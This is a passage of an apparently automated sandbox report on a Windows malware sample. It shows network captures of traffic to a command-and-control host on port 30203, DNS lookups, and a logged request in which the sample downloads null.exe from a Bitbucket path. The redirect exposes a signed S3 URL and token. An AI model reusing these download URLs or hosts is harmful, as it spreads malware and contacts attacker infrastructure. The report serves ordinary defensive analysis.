Dec 12, 2024 17:38:08.117577076 CET	50076	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:08.125724077 CET	30203	50075	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:08.241172075 CET	30203	50076	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:08.241313934 CET	50076	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:08.242469072 CET	50076	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:08.365233898 CET	30203	50076	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:08.365308046 CET	50076	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:08.485224009 CET	30203	50076	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:12.755521059 CET	30203	50076	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:12.756037951 CET	50076	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:12.756165981 CET	50076	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:12.867357969 CET	50077	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:12.875840902 CET	30203	50076	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:12.987490892 CET	30203	50077	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:12.987853050 CET	50077	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:12.988660097 CET	50077	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:13.108588934 CET	30203	50077	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:13.108711958 CET	50077	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:13.228890896 CET	30203	50077	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:17.039680004 CET	50077	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:17.159950972 CET	30203	50077	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:17.160419941 CET	50077	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:17.280257940 CET	30203	50077	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:17.481020927 CET	30203	50077	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:17.483525038 CET	50077	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:17.483716011 CET	50077	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:17.586316109 CET	50078	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:17.603655100 CET	30203	50077	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:17.706454039 CET	30203	50078	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:17.706686020 CET	50078	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:17.707475901 CET	50078	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:17.828247070 CET	30203	50078	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:17.829770088 CET	50078	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:17.950084925 CET	30203	50078	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:22.466106892 CET	30203	50078	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:22.467288017 CET	50078	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:22.467423916 CET	50078	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:22.570775986 CET	50079	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:22.594119072 CET	30203	50078	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:22.814873934 CET	30203	50079	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:22.815006018 CET	50079	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:22.815797091 CET	50079	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:22.936450005 CET	30203	50079	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:22.936533928 CET	50079	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:23.056687117 CET	30203	50079	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:24.362795115 CET	50079	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:24.483139992 CET	30203	50079	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:24.483237028 CET	50079	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:24.603156090 CET	30203	50079	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:27.206731081 CET	30203	50079	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:27.206870079 CET	50079	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:27.206986904 CET	50079	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:27.326821089 CET	30203	50079	181.131.217.244	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 17:34:17.400513887 CET	50978	53	192.168.2.6	1.1.1.1
Dec 12, 2024 17:34:17.538395882 CET	53	50978	1.1.1.1	192.168.2.6
Dec 12, 2024 17:34:19.476897001 CET	61284	53	192.168.2.6	1.1.1.1
Dec 12, 2024 17:34:19.614816904 CET	53	61284	1.1.1.1	192.168.2.6
Dec 12, 2024 17:34:21.850301981 CET	51049	53	192.168.2.6	1.1.1.1
Dec 12, 2024 17:34:22.254188061 CET	53	51049	1.1.1.1	192.168.2.6
Dec 12, 2024 17:35:06.851305008 CET	64347	53	192.168.2.6	1.1.1.1
Dec 12, 2024 17:35:07.086836100 CET	53	64347	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 12, 2024 17:34:17.400513887 CET	192.168.2.6	1.1.1.1	0x6e15	Standard query (0)	navegacionseguracol24vip.org	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:34:19.476897001 CET	192.168.2.6	1.1.1.1	0x60a7	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:34:21.850301981 CET	192.168.2.6	1.1.1.1	0xf17a	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:35:06.851305008 CET	192.168.2.6	1.1.1.1	0x3f73	Standard query (0)	navegacionseguracol24vip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 12, 2024 17:34:17.538395882 CET	1.1.1.1	192.168.2.6	0x6e15	No error (0)	navegacionseguracol24vip.org		181.131.217.244	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:34:19.614816904 CET	1.1.1.1	192.168.2.6	0x60a7	No error (0)	bitbucket.org		185.166.143.50	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:34:19.614816904 CET	1.1.1.1	192.168.2.6	0x60a7	No error (0)	bitbucket.org		185.166.143.49	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:34:19.614816904 CET	1.1.1.1	192.168.2.6	0x60a7	No error (0)	bitbucket.org		185.166.143.48	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:34:22.254188061 CET	1.1.1.1	192.168.2.6	0xf17a	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 17:34:22.254188061 CET	1.1.1.1	192.168.2.6	0xf17a	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 17:34:22.254188061 CET	1.1.1.1	192.168.2.6	0xf17a	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.29.178	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:34:22.254188061 CET	1.1.1.1	192.168.2.6	0xf17a	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.168.89	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:34:22.254188061 CET	1.1.1.1	192.168.2.6	0xf17a	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.172.225	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:34:22.254188061 CET	1.1.1.1	192.168.2.6	0xf17a	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.109.11	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:34:22.254188061 CET	1.1.1.1	192.168.2.6	0xf17a	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.137.209	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:34:22.254188061 CET	1.1.1.1	192.168.2.6	0xf17a	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.30.192	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:34:22.254188061 CET	1.1.1.1	192.168.2.6	0xf17a	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.17.61	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:34:22.254188061 CET	1.1.1.1	192.168.2.6	0xf17a	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.184.171	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:35:07.086836100 CET	1.1.1.1	192.168.2.6	0x3f73	No error (0)	navegacionseguracol24vip.org		181.131.217.244	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bitbucket.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49709	185.166.143.50	443	7008	C:\Users\user\Desktop\ozfqy8Ms6t.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 16:34:21 UTC	101	OUT	GET /facturacioncol/fact/downloads/null.exe HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
2024-12-12 16:34:21 UTC	5950	IN	HTTP/1.1 302 Found Date: Thu, 12 Dec 2024 16:34:21 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Server: AtlassianEdge Location: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIGUX6ORX&Signature=Zjqmry%2BNGZ5szyFv0hOwnpTu2lo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJIMEYCIQCGK9zub4%2FRHXDXeMN6k7XbjWwi0RJXwId9Ng33n0K%2F8QIhAN1Z2SPiS2gBnFaWWj6eia3uOu6PtMwycvP14HCcOT8YKrACCML%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwcdwWUJNKUMa%2FVym4qhALnixtfvkFlXAR1WJ687dROjrNTrlqec61HZk4xyIIbcd%2BRgXd%2Fh168iQ4%2BTw9BMZ81Zwv1RSJSVyNitKiXJcfIQRolpUMKdiNxfFyyqqcS0Tg2S3lJkWed%2BtKsHpen1E%2FDAnwDyxdvLayliINqWRXGDW9o6tVJBmDEqSXaOt6hqwZ%2FZha79%2Ff8W3BbEbePj2r6gzjnKKD7c1Ovt6LbwVJN%2B9jBhD2fyIBe5Lh3ZNbIVl4daY0oFLDS4VVAIEjburQUN4QSd7FkqlJhmbW3zmDwMI5%2Fb2gCZabQeQoSAb8VczrPcqmysGUiRjzARXLheXFHYDegGiflUK0oIiw2VGfaVRixBDCWnOy6BjqcARFHPbVaro%2BtHveeLvVVaDflun9rRVYAEJEvIZ58bqvNw79lxq2jSq9Ozh3SUPLz%2B6oHkYiGFJsYRa7HJIWuZdD%2FxHsyV%2BkzTZEx49KbjWL [TRUNCATED] Expires: Thu, 12 Dec 2024 16:34:21 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private X-Used-Mesh: False Vary: Accept-Language, Origin Content-Language: en X-View-Name: bitbucket.apps.downloads.views.download_file X-Dc-Location: Micros-3 X-Served-By: b60f9bbea716 X-Version: b7875da02c7c X-Static-Version: b7875da02c7c X-Request-Count: 2397 X-Render-Time: 0.044135332107543945 X-B3-Traceid: dec43f2ad93e42d9987e4b82a7b48913 X-B3-Spanid: de156e5b14435d92 X-Frame-Options: SAMEORIGIN Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend. [TRUNCATED] X-Usage-Quota-Remaining: 999241.540 X-Usage-Request-Cost: 771.63 X-Usage-User-Time: 0.011216 X-Usage-System-Time: 0.011933 X-Usage-Input-Ops: 0 X-Usage-Output-Ops: 0 Age: 0 X-Cache: MISS X-Content-Type-Options: nosniff X-Xss-Protection: 1; mode=block Atl-Traceid: dec43f2ad93e42d9987e4b82a7b48913 Atl-Request-Id: dec43f2a-d93e-42d9-987e-4b82a7b48913 Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600} Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"} Server-Timing: atl-edge;dur=156,atl-edge-internal;dur=3,atl-edge-upstream;dur=154,atl-edge-pop;desc="aws-eu-central-1" Connection: close

Target ID:	1
Start time:	11:34:15
Start date:	12/12/2024
Path:	C:\Users\user\Desktop\ozfqy8Ms6t.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ozfqy8Ms6t.exe"
Imagebase:	0x920000
File size:	604'672 bytes
MD5 hash:	7E230785CAC6BE6B780603A6C8B4EF32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.4601478973.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.4602971347.00000000054B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.4600329598.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	50%
Total number of Nodes:	44
Total number of Limit Nodes:	4

Executed Functions

Function 054203C7 Relevance: 2.4, Strings: 1, Instructions: 1141COMMON

Download Yara Rule

Strings

4, xrefs: 05420DAD

Memory Dump Source

Source File: 00000001.00000002.4602870122.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5420000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 86eaac2f1fdce119861be822565b31e516423926fc8315b1d20a7bb399cdc9fe
Instruction ID: 22f7d98d252eab781a770d34428bc78eb071240cfad8ccc7fc30fbe8ea8c8e0a
Opcode Fuzzy Hash: 86eaac2f1fdce119861be822565b31e516423926fc8315b1d20a7bb399cdc9fe
Instruction Fuzzy Hash: 4CB2FD74A00228CFDB14DFA5C998BAEB7F6BF48304F558196E509AB3A5CB719C81CF50

Function 054206FF Relevance: 1.7, Strings: 1, Instructions: 495COMMON

Download Yara Rule

Strings

4, xrefs: 05420DAD

Memory Dump Source

Source File: 00000001.00000002.4602870122.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5420000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 5aff0f9e7d81cbbd88bd95bd4eaf639138e27ce6af669f094896e4c3eab5cc7a
Instruction ID: f60d2b442ebb45701f028fc58d4ab03d68c5cacb42b25d0fc6a644d35f439434
Opcode Fuzzy Hash: 5aff0f9e7d81cbbd88bd95bd4eaf639138e27ce6af669f094896e4c3eab5cc7a
Instruction Fuzzy Hash: 6D22FC74A00225CFDB14DF65C988BAAB7F2BF48304F5481DAE509AB3A5DB71AD81CF50

Function 055726F8 Relevance: 1.7, APIs: 1, Instructions: 162
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0557280E

Memory Dump Source

Source File: 00000001.00000002.4603202495.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5570000_ozfqy8Ms6t.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de95597b07bcccbeeac5beb042a0c25b21d54840a39efba3fd03c7d23d06dae4
Instruction ID: 4465b401fab4edce579f7c660e6b0ec505c9fde95ec2a66fdc718b06b5557805
Opcode Fuzzy Hash: de95597b07bcccbeeac5beb042a0c25b21d54840a39efba3fd03c7d23d06dae4
Instruction Fuzzy Hash: 6B619A38A00218CFDB24DB65E648BA937F3FB88315F1484B9E106AB794DB369D85CF41

Function 055724A8 Relevance: 1.6, APIs: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 05572557

Memory Dump Source

Source File: 00000001.00000002.4603202495.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5570000_ozfqy8Ms6t.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 70d4c9cbcf75cf239d1816b370f8c90fbd0fcd2c9c66d9b2c9700b0796deb894
Instruction ID: 0841ebcc1b63d4891aef8c4401ef1f0fd4d317a7b9de0e8f76d95d3c6d0b5402
Opcode Fuzzy Hash: 70d4c9cbcf75cf239d1816b370f8c90fbd0fcd2c9c66d9b2c9700b0796deb894
Instruction Fuzzy Hash: F25192353001108FC754FBBAE19AFA933E6BB8C216B46466AD10BDB799CE319D81CF51

Function 055724B8 Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 05572557

Memory Dump Source

Source File: 00000001.00000002.4603202495.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5570000_ozfqy8Ms6t.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fbd54d217c11da5c94cf59c1121f27c6f8d54c30d114b76212fb0996d59b7bac
Instruction ID: 38ffb1a904de7e118b693ac5a1db50dfdcf9d8f615a5b45192153412d60671f8
Opcode Fuzzy Hash: fbd54d217c11da5c94cf59c1121f27c6f8d54c30d114b76212fb0996d59b7bac
Instruction Fuzzy Hash: 165171353001108FC754FBBAE19AFA933E6BB8C216B46466AD10BDB799CE309D81CF51

Function 05574A88 Relevance: 1.5, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\V[n, xrefs: 05574CD3

Memory Dump Source

Source File: 00000001.00000002.4603202495.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5570000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID: \V[n
API String ID: 0-1005319620
Opcode ID: 2cf0ba9444f37c7de33c54b8c16b6d7a13dac4d2347504d88790ff5c6522027c
Instruction ID: 2f3251a6657d303ecc986f28407b06e41472ce2679d060ad0cbb3b6ed02aa2fc
Opcode Fuzzy Hash: 2cf0ba9444f37c7de33c54b8c16b6d7a13dac4d2347504d88790ff5c6522027c
Instruction Fuzzy Hash: 5B915A70E0024DDFDF14CFA9E9857AEBBF2BF88314F148529E409AB254EB749945CB81

Function 05570B58 Relevance: .8, Instructions: 751
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.4603202495.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5570000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ff709d4bb0bbcc0eab18ebe07665377ca56c5e1070b2238b08a37dbf3f63c7
Instruction ID: 14eafebcdcc54020f820ca5e05a46ebcd9af0df12748f1e6a647e6b9c4b4300a
Opcode Fuzzy Hash: 72ff709d4bb0bbcc0eab18ebe07665377ca56c5e1070b2238b08a37dbf3f63c7
Instruction Fuzzy Hash: D3526D74B0061A8FCB18DF69D598A6EFBF2FF88300F248529D55AD7390DB30A905CB95

Function 0543236B Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4602929449.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5430000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1938f8702391d0ee528ec8b3bf0a5888f6fb910709b1048b283f549a6660b3f
Instruction ID: a3a8e17b2e40b1717db5db38885169095ec7fa7a5b0e743aa041c9d094149250
Opcode Fuzzy Hash: f1938f8702391d0ee528ec8b3bf0a5888f6fb910709b1048b283f549a6660b3f
Instruction Fuzzy Hash: CFF10834A04219CFDB15DF68C994AA9BBB2BF88300F5585D9D90AAB361DF71ED81CF40

Function 0557A251 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4603202495.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5570000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 692490a5f2844db48780f9505e826ae5fd9fd58fd9bfc976b393a4dd3b13c1ed
Instruction ID: 4994c189c833228f50118f82f8df678bb6ced8bf19af1236166d11fef07ec82b
Opcode Fuzzy Hash: 692490a5f2844db48780f9505e826ae5fd9fd58fd9bfc976b393a4dd3b13c1ed
Instruction Fuzzy Hash: ECE1F334A04108CFEB14DF65E588BAD77B3FB88315F2580A5E506AB7A5CB76AD81CF40

Function 055773A1 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4603202495.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5570000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f2ef016d72d4c5f4ae93af4b3c04ab771bbcdfa77fe97dd198bf1f5bd30ab89
Instruction ID: 92205f4e7b8e962a5620b45d49e593d60eb7152deb161d4b7ee77bc9676a4740
Opcode Fuzzy Hash: 1f2ef016d72d4c5f4ae93af4b3c04ab771bbcdfa77fe97dd198bf1f5bd30ab89
Instruction Fuzzy Hash: FDD16C30A10208CFDB15EB6AF584BA977B3FB8C305F2185A9D0069B794DB35AD85CF81

Function 055773B0 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4603202495.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5570000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf08a841a13a14065be414e6cc9b8a3db63996d0e96a460347e0b92ec0144199
Instruction ID: 9e3d26bca08a1248131489f55fe454c6090029bbd458ec136f28b1c62ba19c1f
Opcode Fuzzy Hash: cf08a841a13a14065be414e6cc9b8a3db63996d0e96a460347e0b92ec0144199
Instruction Fuzzy Hash: 17D15C30A10208CFDB15EB6AF544BA977B3FB8C305F5185A9D0069B794DB35AD85CF81

Function 0557A60C Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4603202495.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5570000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd08fdfb6a6c2d159abbab909d7911a34825a2b7cbf2f2ab577b06c3d3a65747
Instruction ID: af17cd26f2842d167509a8361651e93e6889713f2e4909dfd3c232070fa22a05
Opcode Fuzzy Hash: fd08fdfb6a6c2d159abbab909d7911a34825a2b7cbf2f2ab577b06c3d3a65747
Instruction Fuzzy Hash: 23D1F334A00108CFEB14DF66E588BAD77B3FB88315F2584A5E5069B7A5CB76AD81CF40

Function 055756A0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4603202495.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5570000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 767b20f0b7630e17828a881df32a693dc336d83b73114ec5475d3e52641e3016
Instruction ID: 8be5b371d3480fa026a36d1ef854eb1fbe5cb2f9936697fb6fbd778e0e83a41c
Opcode Fuzzy Hash: 767b20f0b7630e17828a881df32a693dc336d83b73114ec5475d3e52641e3016
Instruction Fuzzy Hash: 44B15B70E0020DDFDB10CFA9E8857ADBBF2BF88754F248529D419AB294EB749845CF81

Function 05576B60 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4603202495.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5570000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 001372d76eb1c5258ec05ca85d85d11199c477e572b7f5f948ad5798f991c4c0
Instruction ID: 23112410b900512f3f392f660de991b6412a87602c28bbcbdb41cbcd0a724409
Opcode Fuzzy Hash: 001372d76eb1c5258ec05ca85d85d11199c477e572b7f5f948ad5798f991c4c0
Instruction Fuzzy Hash: 0991C130A00618CFDB14EBA6E548BBA33F3FB88315F198479D40A9B698CB359D85CF50

Function 05438EB8 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4602929449.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5430000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5263bddd7f2b308f70512e06ec23faf55cc2d334e43d98bbf59e38d5c4adfba7
Instruction ID: 0999333a8963dfa8e9e578680bc617aadebef21799e6acc4c06dba2234cccf2e
Opcode Fuzzy Hash: 5263bddd7f2b308f70512e06ec23faf55cc2d334e43d98bbf59e38d5c4adfba7
Instruction Fuzzy Hash: 2B91D130A05105CFEB14DF5AD546BEAB7B3FB88304F1481A6E501A73A9D775AE89CF40

Function 0557779B Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4603202495.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5570000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beea91ce223d375f58987986f8b6fb689a9c1d29f4a92ac45f93788f7c1ebf89
Instruction ID: cb18fbe0fc417eab169a84455714c6250709e5eb5a5fd6254e5e3f4fe637d4cb
Opcode Fuzzy Hash: beea91ce223d375f58987986f8b6fb689a9c1d29f4a92ac45f93788f7c1ebf89
Instruction Fuzzy Hash: 62A11830A10208CFDB15DF6AF584BA977B3FB8C305F2585A9D0069B6A4DB35AD85CF81

Function 05438EA9 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4602929449.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5430000_ozfqy8Ms6t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6059c9c814fce7e68b8c1135413521e5aaa2eae8eb3bd140ffcd969610e58b70
Instruction ID: 46c3f4ebdd19d9c8b418bfb4aafa11ca145191c1ec63e42af0fce10d8684f5d0
Opcode Fuzzy Hash: 6059c9c814fce7e68b8c1135413521e5aaa2eae8eb3bd140ffcd969610e58b70
